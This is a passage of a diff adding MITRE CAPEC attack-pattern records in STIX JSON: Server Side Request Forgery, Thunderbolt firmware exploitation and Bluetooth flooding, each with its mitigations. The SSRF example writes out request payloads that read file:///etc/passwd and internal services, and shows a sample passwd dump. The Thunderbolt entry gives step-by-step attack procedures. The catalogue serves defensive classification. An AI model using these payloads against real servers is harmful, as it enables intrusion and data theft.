"attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009", + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c", + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Availability": [ + "Modify Data", + "Resource Consumption" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory\n \n A malicious user can modify the request URL to look like this instead:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://localhost/server-status\n \n or\n \n vulnerableService = file:///etc/passwd\n \n or\n \n vulnerableService=dict://localhost:12345/info\n \n If the exploit is successful, the server may return the data requested by the adversary\n \n root:!:0:0::/:/usr/bin/ksh\n daemon:!:1:1::/etc:\n bin:!:2:2::/bin:\n sys:!:3:3::/usr/sys:\n adm:!:4:4::/var/adm:\n uucp:!:5:5::/usr/lib/uucp:\n guest:!:100:100::/home/guest:\n nobody:!:4294967294:4294967294::/:\n lpd:!:9:4294967294::/:\n lp:*:11:11::/var/spool/lp:/bin/false\n invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n 
paul:!:201:1::/home/paul:/usr/bin/ksh\n jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh\n \n ", + "\n The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. [REF-646]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target application: Find target web application that accepts a user input and retrieves data from the server

Experiment

  1. Examine existing application requests: Examine HTTP/GET requests to view the URL query format. Adversaries test to see if this type of attack is possible through weaknesses in an application's protection to Server Side Request Forgery

  2. Techniques
    Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.
    Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.
    Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output.

Exploit

  1. Malicious request: Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services and sends the request to the application

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Server must be running a web application that processes HTTP requests." + ], + "x_capec_resources_required": [ + "[None] No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.", + "Medium": "The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Handling incoming requests securely is the first line of action to mitigate this vulnerability. 
This can be done through URL validation.", + "id": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6377c3e9-f7ce-470a-935c-754995e66989", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.", + "id": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df4b3787-fb80-4016-b3ec-7b279539e710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + 
}, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.", + "id": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--814c7fba-41b2-4ab4-b0a9-1c73b58b395f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. 
By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.", + "id": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fab9925e-dd41-45aa-bae8-f2d7f2595513", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. 
can be prevented.", + "id": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. 
Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.\n ", + "external_references": [ + { + "external_id": "CAPEC-665", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/665.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-1188", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1188.html" + }, + { + "external_id": "CWE-862", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/862.html" + }, + { + "description": "Exploitation for Defensive Evasion", + "external_id": "T1211", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1211" + }, + { + "description": "Pre-OS Boot: Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "Modify Authentication Process", + "external_id": "T1556", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556" + }, + { + "description": "Björn Ruytenberg, Thunderspy When Lighting Strikes Thrice: Breaking Thunderbolt 3 Security, 2020, Eindhoven University of Technology", + "external_id": "REF-647", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/" + }, + { + "description": "Björn Ruytenberg, Breaking Thunderbolt Protocol Security: Vulnerability Report, 2020--04---17, Eindhoven University of Technology", + "external_id": "REF-648", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/assets/reports/breaking-thunderbolt-security-bjorn-ruytenberg-20200417.pdf" + }, 
+ { + "description": "Liam Tung, Thunderbolt flaws affect millions of computers – even locking unattended devices won't help, 2020--05---11, ZDNet", + "external_id": "REF-649", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/thunderbolt-flaws-affect-millions-of-computers-even-locking-unattended-devices-wont-help/" + }, + { + "description": "Liam Tung, Microsoft: Worried about Thunderbolt attacks? Get a Windows 10 Secured-Core PC, 2020--05---14, ZDNet", + "external_id": "REF-650", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/microsoft-worried-about-thunderbolt-attacks-get-a-windows-10-secured-core-pc/" + }, + { + "description": "Jon Porter, Thunderbolt flaw allows access to a PC’s data in minutes, 2020--05---11, The Verge", + "external_id": "REF-651", + "source_name": "reference_from_CAPEC", + "url": "https://www.theverge.com/2020/5/11/21254290/thunderbolt-security-vulnerability-thunderspy-encryption-access-intel-laptops" + }, + { + "description": "Jerry Bryant, MORE INFORMATION ON THUNDERBOLT(TM) SECURITY, 2020--05---10, Intel Corporation", + "external_id": "REF-652", + "source_name": "reference_from_CAPEC", + "url": "https://blogs.intel.com/technology/2020/05/more-information-on-thunderspy/#gs.0o6pmk" + } + ], + "id": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Thunderbolt Protection Flaws", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" 
+ ], + "x_capec_example_instances": [ + "\n An adversary steals a password protected laptop that contains a Thunderbolt 3 enabled port, from a work environment. The adversary uses a screw driver to remove the back panel of the laptop and connects a SPI Programming device to the Thunderbolt Host Controller SPI Flash of the stolen victim device to interface with it on the adversary's own Thunderbolt enabled device via Thunderbolt cables. The SPI Programming device is utilized to execute scripts/tools from the adversary's own system to copy, parse, and modify the victim's Thunderbolt firmware stored on SPI Flash. The device UUID value is obtained, by computing the appropriate offset based upon Thunderbolt firmware version and the OS of victim device, from the DROM section of victim Thunderbolt host controller firmware image. The firmware image is written to adversary Thunderbolt host controller SPI flash to clone and spoof victim device identity. The adversary reboots the victim device, with the victim device identifying the Thunderbolt connection of the adversary's Thunderbolt device as itself and enables PCIe tunneling. The adversary finally transfers the hard drive and memory contents of victim device across Thunderbolt connection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey physical victim environment and potential Thunderbolt system targets: The adversary monitors the target's physical environment to identify systems with Thunderbolt interfaces, identify potential weaknesses in physical security in addition to periods of nonattendance by the victim over their Thunderbolt interface equipped devices, and when the devices are in locked or sleep state.

  2. Evaluate the target system and its Thunderbolt interface: The adversary determines the device's operating system, Thunderbolt interface version, and any implemented Thunderbolt protections to plan the attack.

Experiment

  1. Obtain and/or clone firmware image: The adversary physically manipulates Thunderbolt enabled devices to acquire the firmware image from the target and/or adversary Thunderbolt host controller's SPI (Serial Peripheral Interface) flash.

  2. Techniques
    Disassemble victim and/or adversary device enclosure with basic tools to gain access to Thunderbolt controller SPI flash by connecting adversary SPI programmer.
    Adversary connects SPI programmer to adversary-controlled Thunderbolt enabled device to obtain/clone victim thunderbolt controller firmware image through tools/scripts.
    Clone firmware image with SPI programmer and tools/scripts on adversary-controlled device.
  3. Parse and locate relevant firmware data structures and information based upon Thunderbolt controller model, firmware version, and other information: The acquired victim and/or adversary firmware image is parsed for specific data and other relevant identifiers required for exploitation, based upon the victim device information and firmware version.

  4. Techniques
    Utilize pre-crafted tools/scripts to parse and locate desired firmware data and modify it.
    Locate DROM (Device Read Only Memory) data structure section and calculate/determine appropriate offset to replicate victim device UUID.
    Locate ACL (Access Control List) data structure and calculate/determine appropriate offsets to identify victim device UUID.
    Locate data structure containing challenge-response key information between appropriate offsets.
  5. Disable Thunderbolt security and prevent future Thunderbolt security modifications (if necessary): The adversary overrides the target device's Thunderbolt Security Level to \"None\" (SL0) and/or enables block protections upon the SPI flash to prevent the ability for the victim to perform and/or recognize future Thunderbolt security modifications as well as update the Thunderbolt firmware.

  6. Techniques
    The adversary-controlled Thunderbolt device, connected to SPI programmer and victim device via Thunderbolt ports, is utilized to execute commands within tools/scripts to disable SPI flash protections, modify Thunderbolt Security Level, and enable malicious SPI flash protections.
  7. Modify/replace victim Thunderbolt firmware image: The modified victim and/or adversary thunderbolt firmware image is written to attacker SPI flash.

Exploit

  1. Connect adversary-controlled thunderbolt enabled device to victim device and verify successful execution of malicious actions: The adversary needs to determine if their exploitation of selected vulnerabilities had the intended effects upon victim device.

  2. Techniques
    Observe victim device identify adversary device as the victim device and enables PCIe tunneling.
    Resume victim device from sleep, connect adversary-controlled device and observe security is disabled and Thunderbolt connectivity is restored with PCIe tunneling being enabled.
    Observe that in UEFI or Thunderbolt Management Tool/UI that the Security Level does not match adversary modified Security Level of \"None\" (SL0)
    Observe after installation of Firmware update that within Thunderbolt Management UI the \"NVM version\" is unchanged/same prior to the prompt of successful Firmware update/installation.
  3. Exfiltration of desired data from victim device to adversary device: Utilize PCIe tunneling to transfer desired data and information from victim device across Thunderbolt connection.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_peer_of_refs": [ + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_prerequisites": [ + "The adversary needs at least a few minutes of physical access to a system with an open Thunderbolt port, version 3 or lower, and an external thunderbolt device controlled by the adversary with maliciously crafted software and firmware, via an SPI Programming device, to exploit weaknesses in security protections." + ], + "x_capec_resources_required": [ + "SPI Programming device capable of modifying/configuring or replacing the firmware of Thunderbolt device stored on SPI Flash of target Thunderbolt controller, as well as modification/spoofing of adversary-controlled Thunderbolt controller.", + "Precrafted scripts/tools capable of implementing the modification and replacement of Thunderbolt Firmware.", + "Thunderbolt-enabled computing device capable of interfacing with target Thunderbolt device and extracting/dumping data and memory contents of target device." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on scripting and SPI programming in order to configure and modify Thunderbolt controller firmware and software configurations." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Kernel Direct Memory Access Protection", + "id": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a0e0f629-1901-46f1-84f7-14f999416101", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option USB Passthrough mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface", + "id": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8cd41ad-b8ed-421f-9327-7fd7d7f1bb72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option DisplayPort mode - Thunderbolt 3 system port operates as video-only DP interface", + "id": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92fe9893-60f3-4669-b1b1-49ee6fe775e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option Mixed USB/DisplayPort mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface with support for DP mode", + "id": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5186383a-023d-4ef1-918a-0f11c9d14b4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Set Security Level to SL3 for Thunderbolt 2 system port", + "id": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25053510-6191-4eb9-928f-471d5618f597", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable PCIe tunneling to set Security Level to SL3", + "id": "course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae02655e-7790-4816-8ebd-c5291df0de36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Boot Camp upon MacOS systems", + "id": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd286fbd-f1da-41de-9516-8d195eb182a9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. 
This attack must be carried out within close proximity to a Bluetooth enabled device.", + "external_references": [ + { + "external_id": "CAPEC-666", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/666.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Amrita Mitra, What is BlueSmack Attack?, 2017--03---08, The Security Buddy", + "external_id": "REF-655", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-bluesmack-attack/" + } + ], + "id": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BlueSmacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for Bluetooth Enabled Devices: Using BlueZ along with an antenna, an adversary searches for devices with Bluetooth on.

  2. Techniques
    Note the MAC address of the device you want to attack.

Experiment

  1. Change L2CAP Packet Length: The adversary must change the L2CAP packet length to create packets that will overwhelm a Bluetooth enabled device.

  2. Techniques
    An adversary downloads and installs BlueZ, the standard Bluetooth utility package for Linux.

Exploit

  1. Flood: An adversary sends the packets to the target device, and floods it until performance is degraded.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application has Bluetooth enabled." + ], + "x_capec_skills_required": { + "Low": "An adversary only needs a Linux machine along with a Bluetooth adapter, which is extremely common." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth when not being used.", + "id": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cf51b79-b6f1-4956-b6cc-c945dbe525c1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 